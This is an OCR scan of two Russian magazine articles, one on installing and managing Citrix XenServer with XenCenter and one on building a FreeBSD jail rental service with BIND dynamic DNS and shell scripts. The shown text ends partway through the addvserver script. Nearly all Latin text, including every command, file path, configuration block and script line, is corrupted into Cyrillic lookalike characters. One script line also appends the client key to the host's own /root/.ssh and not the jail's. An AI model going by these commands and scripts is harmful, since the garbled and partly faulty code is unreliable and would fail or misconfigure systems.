ные РѴБ-драйвера для ѴѴіпсІоѵѵз, плюс документа- 
ция. На втором — сконфигурированный шаблон 
(іетріаіез), необходимый для поддержки госте- 
вых машин Ііпих (БеЪіап Заг^е/Еисіі) . 

Сам процесс установки ХепЗегѵег несложен и не- 
сколько напоминает упрощенную инсталляцию 
Ііпих. Помни: все данные на диске будут уничтоже- 
ны, разработчикнерекомендуетиспользовать двой- 
ную загрузку, а инсталлятор не имеет никаких для 
этого инструментов (по крайней мере, видимых) . 
Загружаемся с іпзіаіі-ссі (кроме обычной, 
можно использовать и установку РХЕ). В 
первом окне будет предложено выбрать ре- 
жим — обычный (Зіапбагсі) или продвину- 
тый (Абѵапсесі) . Нажимаем <Епіег>. В окне, 
появившемся после выбора клавиатурной 
раскладки (я предпочел из), предстоит опре- 
делиться с дальнейшими действиями. Собс- 
твенно, для установки нам нужен предложен- 
ный по умолчанию вариант «Іпзіаіі ог ир^габе 



ХепЗегѵег Воз!». Другие пункты позволяют 
загрузить драйвер (на следующем шаге пред- 
стоит указать источник) и конвертировать 
установленную на компьютере ОС в ѴМ. Далее 
мастер предупредит о том, что все данные бу- 
дут уничтожены. Подтверждаем наш выбор и 
принимаем лицензию. Если сервер не подде- 
рживает технологии Іпіеі ѴТ/АМБ-Ѵ, или они 
отключены в ВІ05, появится предупреждение 
о работе ХепЗегѵег с ограниченной функцио- 
нальностью. Выбираем затем источник уста- 
новки — привод, ОТЗ или НТТР/ЕТР. Система 
спросит, использовать ли в процессе второй 
диск, отметив, что в случае отсутствия под- 
держки Іпіеі ѴТ/АМБ-Ѵ в качестве гостевых 
систем могут работать только гостевые Ілпих. 
Ілпих-диск легко устанавливается и в уже ра- 
бочей среде (чуть дальше я покажу, как это сде- 
лать) . Проверку носителей можно пропустить. 
Вводим пароль пользователя гооі, сетевые на- 
стройки (БНСР, — либо вручную прописыва- 
ем ІР-адрес, сетевую маску, шлюз, БЫЗ-сервер 
и имя хоста). Причем, когда планируется ра- 
бота пула серверов, необходимо использовать 
только статический ІР-адрес! Осталось задать 



часовой пояс и выполнить настройку времени. 
Все данные собраны, подтверждаем начало ус- 
тановки, выбрав «Іпзіаіі ХепЗегѵег». В процес- 
се инсталляции будет предложено вставить 
второй диск, если его использование было за- 
дано на этапе настройки. 

ПОСЛЕ УСТАНОВКИ Перезагрузись, и тебя 
встретит окно «Сизіотіге Зузіет». В нем содер- 
жится 14 пунктов, при помощи которых можно 
изменить основные системные настройки, про- 
смотреть список работающих ѴМ, создать пул 
ресурсов, управлять системами хранения дан- 
ных, оценить загрузку системы, выключить/ 
перезагрузить систему, выйти в локальный 
шелл и т.д. Ничего сложного здесь нет. Доста- 
точно базовых знаний, чтобы самостоятельно 
сориентироваться в назначении параметров. 
В любом пункте необходимо лишь заполнить 
предложенные параметры, ориентируясь на 
вполне понятные подсказки. Для доступа к на- 
стройкам, требующим прав администратора, 
потребуется ввести пароль гооі. Если на этапе 
установки не были проинсталлированы паке- 
ты со второго диска, это можно сделать после 
установки. Для этого в меню выбираем «Ьосаі 
Соттапб ЗЬеІІ», вводим пароль гооі, вставляем 
диск, монтируем его и запускаем находящийся 
внутри скрипт іпзіаП.зІі: 

# шоипЦ /беѵ/сбгот /тебіа 

# ссі /тебіа 

# . /іпзЦаІІ . зЪ. 

Для управления виртуальными машинами пред- 
лагается консоль администратора ХепСепіег. 
Установить ХепСепіег возможно на любой ком- 
пьютер, работающий под управлением ѴѴіпбоѵѵз 
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Программа ХепСопѵегІ позволяет 
конвертировать ѴѴіпсІоѵѵз- смете му 
в виртуальный образ 




Процесс добавления нового зіогаде герозі- Настройка виртуального диска при создании ѴМ 
Іогу довольно прост 
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> Ііпкз 

• Веб-ресурс, посвя- 
щенный ХепЗегѵег 
5-й версии — ѵѵѵѵѵѵ. 
хеп5егѵег5.сот . 



• Документацию 
(на английском] по 
работе с ХепЗегѵег 
найдешь по адресу 

сІос5.хеп5оигсе.сопп/ 

ХепЗегѵег/5.0.0 . 



• На ресурсе ѴМ Сиги 
есть много полезной 
инфы потехнологиям 
виртуализации и вир- 
туальным машинам 
— ѵѵѵѵѵѵ.ѵппди.ги . 




> ѵѵагпіпд 

Все данные при уста- 
новке ХепЗегѵег будут 
уничтожены. Разра- 
ботчик не рекомен- 
дует использовать 
двойную загрузку. 
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ХР/2003/ѴІ5іа. Среди требований — обязательное наличие 
.ЫЕТ Ргатеѵѵогк 2.0 или старше. Дистрибутив ХепСепГег мож- 
но скачать по ссылке на сайте проекта или взять из каталога 
сІіепМпзіаІІ первого установочного диска. Кроме последней, 
пятой, версии ХепЗегѵег, клиент обеспечивает управление 
и 4.x, поддержку которой необходимо подключить на этапе 
установки. В остальном процесс инсталляции стандартен. 
По его окончании ярлык для запуска ХепСепіег помещается в 
меню «Пуск». Кроме того, с ХепСепіег будет сопоставлено не- 
сколько типов файлов: 

• хЪк — файлы резервной копии ХепЗегѵег; 

• хзирбаіе или хзоет — файлы обновлений или патчи 
ХепЗегѵег; 

• хзііс — файл лицензии ХепЗегѵег; 

• хѵа — шаблон или экспорт ѴМ; 

• хепзеагсЬ — результат поиска. 

Интерфейс ХепСеШег не локализован, но, учитывая, что ис- 
пользуются стандартные термины, при базовом знании анг- 
лийского разобраться с настройками несложно. При первом 
включении появится окно с запросом на запрет или разреше- 
ние периодической проверки наличия обновлений. Эту на- 
стройку потом можно изменить, перейдя в Тооіз -> Орііопз -> 
Ирбаіез. Основное окно консоли разбито на несколько частей 
и выглядит, какдругие подобные программы. Слева под меню 
расположена панель ресурсов — здесь находятся все серве- 
ра ХепЗегѵег, к которым подключена консоль, и связанные с 
ними виртуальные машины и пр. После выбора любого пун- 
кта в окне справа показываются его текущие настройки, не- 
которые из них можно изменить. Чуть выше над панелью ре- 
сурсов находится панель поиска, а под ней — «Заѵесі ЗеагсЬез 
Рапеі», где можно найти предустановки для поиска систем по 
определенным критериям. 

СОЗДАЕМ ѴМ Для подключения кустановленному ХепЗегѵег 
нажимаем кнопку «Абб уоиг ХепЗегѵег», вводим имя или ІР- 
адрес узла, данные пользователя гооі и жмем Соппесі. Чтобы 
при последующем запуске консоли выбранный сервер под- 
ключался автоматически, в появившемся окне устанавлива- 
ем флажок «Заѵе апбгезіоге зегѵег соппесііоп . . .». При наличии 
нескольких серверов это заметно упрощает управление . 

Для защиты от несанкционированного доступа к серверам 
следует указать «тазіег Раззѵѵогб», установив одноименный 
флажок и введя его по запросу. 

Чтобы создать новую виртуальную машину, нажимаем кнопку 
«ЫеѵѵѴМ». Запустится мастер, который за 6-7 шагов создаствсе 
необходимые настройки. Клавиша <Р1 > на любом этапе поз- 
воляет получить справку по данному пункту. Виртуальные ма- 
шины создаются из шаблонов (іетріаіез) . Шаблон представля- 
ет собой образ системы со всеми необходимыми настройками 
ѴМ. Это заметно упрощает процесс, так как пользователю не 
нужно разбираться с тонкостями. На первом шаге мастера как 
раз и выбирается шаблон ОС из предложенного списка опе- 
рационок. Если предпочитаемая система в нем отсутствует. 



отмечаем «ОШег іпзіаіі тебіа», но в этом случае об основных 
настройках придется заботиться самостоятельно. Если уста- 
новлен второй диск, при выборе ПеЬіап виртуальная машина 
создается в режиме «геабу-іо-изе», то есть из встроенного шаб- 
лона. В остальных случаях понадобится установочный диск с 
системой. Далее вводим название ѴМ и описание, чтобы легче 
было ориентироваться в назначении при большом количес- 
тве ѴМ. На шаге Ьосаііоп указывается источник, с которого 
будет производиться установка. Если выбран ЭеЬіап, мастер 
его пропустит и перейдет к следующему. Теперь указываем 
количество СРІЛ и объем виртуальной памяти, который будет 
выделен под нужды ѴМ. На этой же странице, в поле внизу, для 
ориентировки выводятся данные сервера — количество СРІф 
общий и доступный для ѴМ размер памяти. Далее переходим к 
этапу «Ѵігшаі Эізк». Как видно из названия, предстоит создать 
виртуальный диск для ѴМ. Если ОС выбрана из шаблона, ско- 
рее всего, мастер предложит оптимальную, по его мнению, 
конфигурацию. Так, для ЭеЪіап будет создано два раздела: 
0,5 и 4 Гб. При необходимости настройки можно изменить. 
Чтобы добавить еще один раздел или изменить настройки 
текущего, нажимаем соответственно Абб или Ебіі — ив окне 
«Эізк $етп§ 5 » вводим нужный размер раздела (Гб). Установ- 
кой флажка «Кеаб Опіу» можно запретить запись. Аналогично, 
на следующем шаге создаем виртуальный сетевой интерфейс. 
Нажимаем в последнем окне кнопку «ЕіпізЬ» и ожидаем, пока 
закончится процесс создания виртуальной машины. Если ус- 
тановлен флажок «ЗіагіѴМ аиіотаіісаііу», после создания ѴМ 



СІІГІХ 

Еззепгіаіз іог 

Одновременно с анонсом ХепЗегѵег компания 
СіГгіх представила новое семейство продуктов — 
Сіігіх Еззепііаіз, причем сразу в двух редакциях 
— Сіігіх Еззепііаіз Іог ХепЗегѵег [ ѵѵѵѵѵѵ.сіігіх.сопп/ 
еззепііаізхз ) и Сіігіх Еззепііаіз іог Ну рег-Ѵ [ ѵѵѵѵѵѵ. 
сіІгіх.сот/еззепііаІзЬѵ ). Новые решения (распро- 
страняются уже на коммерческой основе) включа- 
ют в себя все необходимые инструменты для обес- 
печения законченного цикла ввода приложений и 
виртуальных машин в промышленное применение. 
Обеспечивается построение НідЬ аѵаііабііііу реше- 
ний; упрощено создание скриптов по управлению 
средой виртуализации (Сіігіх ѴѴогкЕІоѵѵЗіисІіо); 
реализована доставка по требованию рабочей 
нагрузки серверов в виртуальную среду или на 
физические серверы (Сіігіх Ргоѵізіопіпд Зегѵег); 
предусмотрено использование возможностей 
сетевых хранилищ данных (Сіігіх ЗіогадеЫпк). 
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Выбор шаблона при создании ѴМ 




Выбор операции во время установки ХепБегѵег 



будет сразу запущена. В случае с БеЪіап вводим пароль пользо- 
вателя гоог иѴЛС и указываем имя узла. После создания ключа 
88Н виртуальная система будет полностью готова к работе. 
На статус ѴМ указывает его значок. Если он зеленого цвета, 
значит, виртуальная машина запущена и работает. Синий — 
приостановлена, желтый — временно недоступна (например, 
перегружается) , красный — выключена. Подробное описание 
ошибок можно найти в журнале, который открывается пере- 
ходом во вкладку Ьо§. 

Чтобы изменить количество виртуальных СРИ, следует 
вызвать окно свойств, выбрав в контекстном меню пункт 
Ргореггіез. Нужные настройки находятся во вкладке 
«МетогуапсіѴСРІІз». Ползунок «УСРИргіогЦу . . .«позволяет 
установить приоритет для текущей виртуальной машины. 
Другие вкладки Ргореггіез также содержат полезные на- 
стройки. Так, в «ЗіагШр Оргіопз» задаются дополнительные 
параметры загрузки. Чтобы получать предупреждения, 
если параметры достигнут критической отметки, следует 
перейти в Аіегг, а затем активировать нужный пункт (СРП, 
сеть и диск), задав уровень и периодичность проверки. 
Пункт Аіегг есть и в настройках свойств каждого вирту- 
ального сервера. Дополнительно в Ргорегйез сервера при- 
сутствует вкладка «Етаіі Ногійсагіопз», где указываются 
настройки почтового сервера, используемого для отправ- 
ки предупреждений. Кроме того, ХепСеЩег предоставляет 
возможность формирования отчета по работе сервера. Для 
этого перейди в «Тооіз Сег Бегѵег БіаШз Кероги» и при по- 
мощи 4-шагового мастера создай отчет, отобрав нужные 
данные. Для удобства поиска виртуальных машин и серве- 
ров используются теги. Для каждого сервера или ѴМ они вы- 
водятся в Сепегаі, в поле Та§5. Чтобы добавить новые теги, 
нажимаем ссылку «Ыеѵѵ иа§5» и вводим в окне их список. 
При помощи пунктов контекстного меню созданную ѴМ мож- 
но копировать, экспортировать как резервную копию или 
сконвертировать в шаблон. Это позволяетпри необходимости 
быстро создать несколько серверов со схожими настройками. 
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Р2Ѵ конвертирование 

В п оста в куХепЗегѵег входит весьма полезная утилита ХепСопѵегЕ Будучи 
запущенной на ѴѴіпсІоѵѵз машине, она предоставляет возможность конвер- 
тировать рабочую систему в ѴНЭ-фор мат или ХѴА-об раз, позволяющий 
им портировать ее на ХепБегѵег. Сам процесс достаточно прост: указываем 
на раздел диска, где установлена ОС, и каталогдля образа. Чтобы конвер- 
тировать Бі п их- сервер, следует за грузиться с установочного диска, вменю 
которого выбрать пункт«СопѵегІ ап ехізйпд 05 оп Отіз тасЬіпеІоа ѴМ ( Р 2 V ) » . 

Бэкап и восстановление всего сервера производится из меню 
«Зегѵег -> ВаскІІр Бегѵег/КезФге РготВаскІІр». 

Чтобы просмотреть графики загрузки СРІІ, НАМ и сети для 
отдельной ѴМ или всего сервера, отметь нужный в панели ре- 
сурсов и в среднем окне перейди во вкладку Регіогтапсе. Ис- 
пользуя ссылки вверху окна, указываем временной промежу- 
ток, за который будут показаны графики. Убрать или добавить 
ресурсы, изменить порядок вывода графиков можно в окне 
«Сопй§иге СгарЬз» (вызывается после нажатия одноименной 
кнопки) . Вид графиков (линия или сплошной) настраивается 
в меню «Тооіз -> Оргіопз -> Регіогтапсе СгарЬз». 

УПРАВЛЕНИЕ РЕПОЗИТАРИЯМИ ХРАНЕНИЯ Рано или 
поздно администратор столкнется с необходимостью уп- 
равления источниками данных, в терминологии ХепБегѵег 
именуемых 8шга§е Керозіюгу (БК). После установки серве- 
ра обычно доступны три вида БК, соответствующих приводу 
компакт-диска, жесткому диску и подключаемым устройс- 
твам. Устройство, помеченное черным значком, является БК 
по умолчанию. Такое устройство используется для хранения 
файловХепБегѵег, аварийного дампа, образов остановленных 
ѴМ. Это же устройство будет предложено по умолчанию при 
создании новой ѴМ. Добавить новое БК очень просто. Для это- 
го нажимаем кнопку «Ыеѵѵ 8шга§е» в главном окне програм- 
мы или «Ыеѵѵ БК» во вкладке 8шга§е выбранного сервера. В 
первом окне отмечаем тип устройства хранения, во втором 
указываем его месторасположение. После добавления дан- 
ные о новом БК появляются в панели ресурсов. Один БК может 
использоваться несколькими серверами ХепБегѵег. 

Новый виртуальный диск для конкретной ѴМ создается или 
подключается во вкладке или в меню 8шга§е. Достаточно вы- 
брать «Бгога^е -> Нем/ Ѵігшаі Эізк», указать его размер, а затем 
подключить в «8шга§е -> АНасІіѴігШаІ Різк». " 1 ^ 
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• Чтобы узнать 
больше о МісгозоЙ 
Нурег-Ѵ, читай статью 
«Гиперактивная 
виртуальность», 
опубликованную в 
февральском номере 
за 2009 год. 

• Об эмуляторе ОЕМІЧ 
читай в статье «Вир- 
туальный полигон» в 
октябрьском номере 
-г за 2008 год. 

• Процесс конверти- 
рования физического 
сервера в вирту- 
альный называют 
РбузісаИю Ѵігіиаі 
Сопѵегзіоп (Р2Ѵ). 
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однимаем сервис по сдаче в аренду виртуальных РгееВБР-серверов 



Сегодня мы увидим возможности РгееВЗЭ іаіі в несколько необычном 
свете - создадим сервис по сдаче в аренду виртуальных РгееВЗЭ- ма- 
шин. Он будет полностью автоматизированным, позволит использо- 
вать разные версии виртуальных окружений на одной физической 
машине и обособленные настройки для каждого сервера. И все это — 
с помощью нескольких простых шелл-скриптов. 



ОДИН ИЗ СПОСОБОВ поднять 
$$$ В КРИЗИСНОЕ ВРЕМЯ Виртуальная 
РгееВЗБ-машина — это не что иное, какпол- 
нофункциональное ] аіі-окружение, которому 
выделен глобально маршрутизируемый ІР-адрес. 
Задумка сервиса в том, чтобы раздавать такие 
окружения на манер номеров в отеле. Клиент 
заходит на сайт, заполняет необходимые поля 
формы, переводит чуток ѴѴМ2 на наш кошелек и 
получает в ответ ІР-адрес своего сервера, домен 
бРого уровня и пароль/ключ к ззб-сервису. После 
чего он волен делать со своим окружением все, 
что душе заблагорассудится — ровно до того 
момента, пока не наступит время съезжать, то 
есть истечет срок аренды, указанный клиентом 
в одном из полей регистрационной формы. По 
истечению этого срока сервер останавливается и 
удаляется. 

Идея виртуальных отелей далеко не нова и, по 
сути, представляет собой пример «Облачной об- 
работки данных» (еп.ѵѵікіре1іа.ог^/ѵ\лкі/СІоис1 

сотриппу) . когда необходимое клиенту 
программное обеспечение предоставляется 
как сервис. Чтобы организовать свой бизнес по 
сдаче в аренду виртуальных ЕгееВЗО-серверов 
от тебя потребуется наличие бГ-го количества 
белых ІР-адресов (по одному на каждый вирту- 
альный сервер), домен, закрепленный за одним 
из них, а также базовое понимание принципов 
работы ЕгееВЗБ. 

НЕМНОГО ТЕОРИИ, ИЛИ СФОРМУЛИРУЕМ 
ТРЕБОВАНИЯ Пользуясь знаниями, почерп- 
нутыми из прошлой моей статьи, организовать 
сервис не так уж и сложно. Окружения )аі1 
подкупают своей простотой и легкостью развер- 
тывания: несколько скриптов-обвязок — и дело 
сделано ! Вот только долго такой сервис не протя- 
нет. Администраторы начнут плевать в монитор 
на второй день работы, клиенты завалят жало- 
бами о низкой производительности, а сервер 



просто загнется, когда количество виртуальных 
серверов перевалит за первый десяток. Поэтому 
перед развертыванием и наймом ЗЕО-шников 
необходимо тщательно продумать будущую 
инфраструктуру. Для начала сформулируем 
требования к нашему сервису: 

1 . Выделенный ІР-адрес и доменное имя для 
каждого окружения. Имя выбирается клиентом 
во время заполнения формы на нашем сайте, а 
ІР-адрес извлекается из специального файла. 

2. Полная свобода клиента в отношении ]аі1- 
окружения. Это значит — никаких ипіопіз и 
пиШз для всего, кроме архива портов. Во время 
создания нового сервера окружение полностью 
копируется из специального каталога. 

3. Общие каталоги /изг/рогіз/сІізііШез и / 
изг/ропз/раска^ез для всех окружений, чтобы 
порт, загруженный одним из клиентов, автома- 
тически был доступен другим. 

4. Автоматизированное создание, удаление, 
запуск и мониторинг серверов. 

5 . Поддержка разных версий виртуальных 
РгееВЗО-серверов на одной физической машине. 

6. Возможность быстрого переноса виртуаль- 
ного сервера на другой сетевой интерфейс или 
диск. 

7. Ежедневный бэкап виртуальных серверов. 

8 . Доступ по ззб с аутентификацией на основе 
ключей. Ключ генерируется во время создания 
виртуального сервера и отдается клиенту по бпрз . 

9. Разные типы аккаунтов: ігіаі — для двухднев- 
ного испытания, базе — обычный, ехіга, ѵір и т. д. 
Теперь подумаем об инфраструктуре сервиса 

и о том, как реализовать все перечисленные 
требования и оставить задел на будущее, то есть 
обеспечить возможность добавления новых 
функций в случае необходимости. После долгих 
размышлений я пришел к варианту, который не 
только нагляден и прост, но и достаточно легок в 
реализации: 

1 . Собираем ЕгееВЗО-окружение в каталог 



/изг/іаіІЬазе/ЕгееВЗП-версия. 

2. Подготавливаем набор скриптов, которые 
будут управлять виртуальными серверами (со- 
здание/удаление, запуск/остановка и т. д.) 

3. Пишем инициализационный скрипт, который 
будет запускать все существующие окружения. 
Кроме самого РгееВЗО-окружения, я поместил в 
каталог /изг/іаіІЬазе еще несколько каталогов и 
конфигурационных файлов, необходимых для 
управления виртуальными серверами: 

• /изг/іаіІЬазе/ЕгееВЗП-версия — чистая сборка 
РгееВЗБ, копируется в каждое окружение при 
его создании. 

• /изг/іаіІЬазе/сІізіШез-версия — монтируется 
к /изг/рогиз/сІізііШез каждого окружения при 
помощи пиШз. 

• /изг/іаіІЬазе/раска^ез-версия — монтируется 
к /изг/рогіз/раска^ез каждого окружения при 
помощи пиІІГз. 

• /изг/іаіІЬазе/сІЬ — база данных] аіі-окруже- 
ний. В первой колонке перечислены ІР-адреса 
всех окружений, во второй — базовый каталог 
(например, /изг/іаіі) , в третьей — сетевой 
интерфейс, в четвертой — доменное имя, в 
пятой — версия, в шестой — е-таіі владельца, 
в седьмой — тип аккаунта, в восьмой — время 
истечения строка аренды в формате ГГММДДЧ- 
ЧММ, в девятой — состояние. 

• /изг/іаіІЬазе/сІеГаикз — дефолтовые значения 
для различных полей конфигурационного файла. 

• /изг/іаіІЬазе/сопГ/ — каталог с настройками 
и ограничениями для разных типов аккаунтов: 
файлы ігіаі, базе, ехіга, ѵір, которые будут прочи- 
таны скриптом запуска виртуального сервера. 
Файл <16 — база данных для всех виртуальных 
серверов в формате раззѵѵб (поля, разделенные 
двоеточием) . Девятое поле «состояние» пред- 
назначено для упрощения администрирования 
серверов и может принимать следующие значе- 
ния: попе — не существует, сіізабіесі — временно 
отключен, ок — окружение создано и готово 
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_к запуску (или уже работает) . В свежеуста- 
-новленной системе, пока еще не существует 
виртуальных серверов, этот файл исполняет 
роль базы доступных ІР-адресов, когда каждая 
строка не содержит других полей, кроме первого 
идевятого (пример: 192.168.0.1— попе). Скрипт, 
создающий новый сервер, просто находит 
первую строку с состоянием попе и заполняет 
ее (тогда строка принимает примерно такой 
вид: 192.168. 0.1:/изг/іаі1:есі0:)аі1.]іо5і:.сот:7.1- 
КЕЬЕА5Е:ѵа8уа@таі1.ги:і:гіа1:0903031700:ок). 

В дальнейшем скрипт запуска виртуальных 
серверов найдет запись с состоянием ок, пе- 
рейдет в каталог, прописанный во втором поле, 
найдет каталог нужного окружения по ІР-адресу 
и запустит в нем виртуальный сервер. 

СОБИРАЕМ ВСЕ ВМЕСТЕ Перво -наперво мы 
должны создать базовое окружение в каталоге 
/изг/іаіІЬазе/РгееВЗП-версия. Для этого перехо- 
дим в /изг/згс и вводим следующую последова- 
тельность команд: 

# ЛАІЬ=/изг/заі1Ьазе/РгееВ8Б- 'ипаше -г' 

# тксііг -р $ ЛАІЬ 

# таке ѵгогіб БЕЗТБІК=$ ЛАІЬ 

# таке бізкгіЪикіоп ВЕЗТБІК=$ ЙАІЬ 

В моем распоряжении находится машина с 
РгееВЗБ 7. 1, поэтому каталог базового окруже- 
ния получил имя «/и5г/іаі1Ьа5е/РгееВ8П-7.1- 
КЕБЕА5Е». Войдем в окружение и проведем ба- 
зовую конфигурацию (доменное имя и ІР-адрес 
на данном этапе не имеют значения) : 

# заіі $ПАІЬ базе. заіі 192 . 168 .0.1 /Ъіп/зЬ 

# коисЪ. /екс/кзкаЪ 

# пемаііазез 

# кгзекир 

# есію патезегѵег 127.0.0.1 > / 

екс/гезоіѵ. сопк 

Файл гс.сопі не трогаем, он будет генериро- 
ваться скриптом асісіѵзегѵег автоматически для 
каждого виртуального сервера. Пароль супер- 
пользователя не устанавливаем: для окружения 
будет создаваться пара ключей, и доступ по 
паролю по умолчанию закрыт. Отредактируем 
/ещ/тоікі и включим туда всю необходимую 
информацию о пользовании сервисом: 

# ѵі /екс/токб 

Выйдем из окружения, набрав ехік Скопируем 
дерево портов из базовой системы в $ ІАІЬ/изг: 

# ср -а /изг/рогкз $ЛАІЬ/изг 
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Теперь освободим точки монтирования дист- 
файлов и пакетов от лишнего мусора: 

# гт -Кк $ ЛАІЬ/изг/рогкз/сіізкІіІез 
$ ЛАІЬ/изг/рогкз/раскадез 

# тксііг $ЛАІЬ/изг/рогкз/с1ізкіі1ез 
$ ЛАІЬ/изг/рогкз/раскадез 

Базовое окружение готово! Конфигурационный 
файл будет отличаться для каждого окружения, 
поэтому заботу о его создании мы возложим 
на плечи скрипта асісіѵзегѵег. Пойдем дальше и 
добавим каталоги /изг^аіІЬазе/сІізііШез-версия 
и /шг/іаі1Ъа5е/раска§е5-версия, которые будут 
подключаться к окружениям с помощью пиШз : 

# тксііг /изг/ з аіІЬазе/ 
{с!ізккі1ез,раскадез}- ’ипате -г' 

Затем создадим файл дефолтовых значений 
для скрипта создания виртуального сервера 
(асісіѵзегѵег) : 

# ѵіт /изг/іаіІЬазе/сІеТаиІІг 

# Дефолтовый сетевой интерфейс . На 
него будут вешаться вновь созданные 
окружения . 

ІР=пкеО 

# Дефолтовый каталог для виртуальных 
серверов . 

НАІЬБІК=/изг/заі1 

Форматбазыданныхвиртуальныхсерверовя 
описал выше. Отмечу лишь, что чистая базадолжна 
выглядеть какнабор записей вида ІР: :::::: :попе, 
по одной записи на каждый доступный внешний 
ІР-адрес. Всю работупо ее заполнению возьмут на 
себя соответствующие скрипты. Теперь у нас есть 
все необходимое для создания и манипулирова- 
ния виртуальными серверами, — осталось только 
установить и настроить БЫЗ-сервер на физичес- 
кой машине. Он нужен ддя привязки доменного 
имени к каждому виртуальному серверу. Мы 
будем использовать ВИ\ГО9, поскольку это единс- 
твенный вменяемый БЫЗ-сервер, позволяющий 
обновлять зоны, не останавливая работу демона. 
Пройдем через простые этапы его настройки: 

1. Сгенерируем пару ключей, которые необходи- 
мы для аутентификации клиента, пожелавшего 
обновить зоны: 

$ бпззес-кеудеп -а НМАС-МБ5 -Ь 12 8 -г 
/беѵ/игапбот -п ІІЗЕК. ЫЗЮРБАТЕ 

Команда запишет в текущий каталог 
два файла с именами примерно такого 
вида — Кпзирсіаіе. + 157 + 36521. кеу и 



Кпзирсіаіе. + 157+ 36521. ргіѵаіе. Они пона- 
добятся скриптам асісіѵзегѵег и сіеіѵзегѵег 
для обновления зон, поэтому скопируем их в 
каталог /шг/іаіІЪазе: 

# ср Кпзирбаке . * /изг/з аіІЬазе/ 

Откроем конфиг /епс/патебЬ/патеб.соп! и 
запишем в него: 

#ѵіт/еІс/патес!Ь/патесксоп{ 

// Позволим управлять сервером толь- 
ко с локальной машины 
сопкгоіз { 

іпек 127.0.0.1 аНочл { Іосаікюзк; 

} кеуз { "ЫЗІІРБАТЕ" ; }; 

} ; 

// Объявим ключ, значение опции 
зесгек можно взять из строки 'Кеу: * 
файла Кпзирбаке . +157+36521 .ргіѵаке 
кеу ЫЗІІРБАТЕ { 

аідогіккт НМАС-МБ5 . ЗІС-АЬС.КЕС. ШТ; 
зесгек ѴР51+2ІбБсРзкВ2І+еСЗП^==; 

} ; 

// Объявим зону кюзк.сот, которую ты 
должен заменить на свой домен 
гопе "кюзк.сот" { 
куре тазкег; 
кііе "кюзк . сот. сПэ" ; 
аііочл-ирсіаке { кеу "ЫЗЮРБАТЕ " ; }; 
покіку уез ; 

} ; 

// Объявим обратную зону, в которой 
должен быть прописан сегмент, выде- 
ленный для твоих внешних ІР-адресов 
гопе " 67 . 16 . 172 . іп-аббг . агра" { 
куре тазкег; 

кііе "кюзк . сот-геѵегзе . 6Ь" ; 
аііоѵ^-ирбаке { кеу "КЗБРБАТЕ " ; }; 
покіку уез; 

} ; 

Настроим зоны кюзКсот (локальные уже 
существуют) : 

#ѵіт/еІс/патесІЬ/Мо5І.сот.сІЬ 

$ТТЬ 86400 

@ Ш ЗОА @ гоок ( 

1 28800 7200 604800 86400 ) 

Ш N3 бпз 

бпз Ш А 

172.16.67.1 

#ѵіт/еІс/патесІЬ/Ио5І.сот-геѵег5е.с1Ь 

$ТТЬ 86400 

@ Ш ЗОА @ гоок ( 

1 28800 7200 604800 86400 ) 
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Структура каталога /изг/іаіІЬазе 



Укажи в них все хосты, имеющие статические имена, и больше эти файлы 
мы трогать не будем, за нас все сделают скрипты. Запустим Ыпб: 

# /ебс/гс . б/патеб збагб 

СКРИПТЫ Чтобы наш сервис соответствовал всем предъявленным 
требованиям и функционировал правильно, необходимо написать, как 
минимум, восемь скриптов: 

1 . аббѵзегѵег — создает виртуальный сервер путем добавления нового 
окружения, обновляет Лі5г/]аі1Ъа5е/сІЪ, добавляет нужную запись в БЫЗ- 
таблицы. 

2. беіѵзегѵег — удаляет виртуальный сервер, принцип действия 
обратный. 

3. бізаЫеѵзегѵег — отключает виртуальный сервер, не удаляя его (флаг 
’сІізаЫесГ). 

4. епаЫеѵзегѵег — включает отключенный виртуальный сервер (ставит 
флаг'ок'). 

5. згаггѵзегѵег — запускает существующий виртуальный сервер, сверяясь 
с /изг/іаіІЬазе/бЬ. 

6. згорѵзегѵег — останавливает существующий виртуальный сервер. 

7. ѵзегѵегз — скрипт для каталога /изг/ІосаІ/еГс/гс.б, который запускает 
виртуальные сервера во время загрузки системы и останавливает во 
время шатдауна. 

8. ѵѵаісЬѵзегѵегз — скрипт, исполняемый сгоп, следит за состоянием вир- 
туальных серверов и останавливает их в случае необходимости (напри- 
мер, при истечении срока аренды) . 

По-хорошему, первые шесть скриптов лучше объединить в один, при- 
нимающий аргументы абб, беі, згагі: и 5Шр, но для сохранения простоты 
изложения оставим их в отдельных файлах. 

Итак, скрипт номер один, аббѵзегѵег (здесь и далее — только ключевые 
элементы скриптов; полные версии ты найдешь на прилагаемом к журна- 
лу диске) : 

# ѵіт /изг/ІосаІ/Ьіп/асісіѵзегѵег 

# Настраиваем переменные 

НОЗТЫАМЕ— $1 ; ОЗѴЕК=$2; ЕМАІЬ=$3; АСТУРЕ=$4; ТІМЕ=$5; 
КЕУ=$ 6 

НАІЬВАЗЕ=/изг/з аіІЬазе 
БВ=$ БАІБВАЗЕ/ 6Ъ 

# Читаем дефолтовые настройки 
. $ БАІБВАЗЕ/бебаиІбз 

# Находим свободный ІР- адрес 
ЗТКШС= 1 дгер ':попе$' $БВ' 

ІР= ' есбю $ЗТКШС I сиб -б ' : 1 -6 1' 

# Копируем окружение... 

ср -а $БАІЕВАЗЕ/ЕгееВЗБ-$ОЗѴЕК $БАІББІК/$ІР 

# ...и создаем для него файл инициализации 
КСС(ЖР=$бАІББІК/ $ІР/ ебс/гс . сопб 

есЬо "бюзбпате=\ " $НОЗТБАМЕ\ " " > $КСССЖЕ 
есбю " пебѵ\гогк_іпбегбасез=\ " \ " " » $КССОМЕ 
есбю " грсЪіпб_епаЫе=\ "№>\ " " » $КСС(ЖЕ 
еско " ззйб_епаЫе=\ "УЕЗ\ " " » $КСССЖЕ 

# Копируем публичный ключ в каталог /гооб/.ззЪ. 
гпкбіг -р $ БАІЕБІК/$ІР/гооб/ . ззбі. 

саб $КЕУ » /гооб/ . ззбі/аиббюгІ2еб_кеуз2 



# Добавляем новый сервер в базу ВИЗ 
БРКЕ()=$ БАІЬВАЗЕ/иргед 

есбю "ирбабе абб $НОЗТЫАМЕ 86400 А $ІР" > $БРКЕ(2 
есбю "зепб" » $ЮРКЕ0 

пзирбабе -к $ БАІЬВАЗЕ/Кпзирбабе . * . ргіѵабе $БРКЕС) 
гш -б $БРКЕ0 

# Записываем информацию об окружении в базу данных 

зеб " / Л $ІР. */з##$ІР: $БАІБВІК: $ІЕ: $НОЗТБАМЕ : $ОЗѴЕК: $ЕМА 
ІЬ : $АСТУРЕ : $ТІМЕ : ок# " $ВВ > ${ВВ}.пе™ 
шѵ ${ВВ} . пем $ВВ 

# Возвращаем ІР сервера 
есбю $ІР 

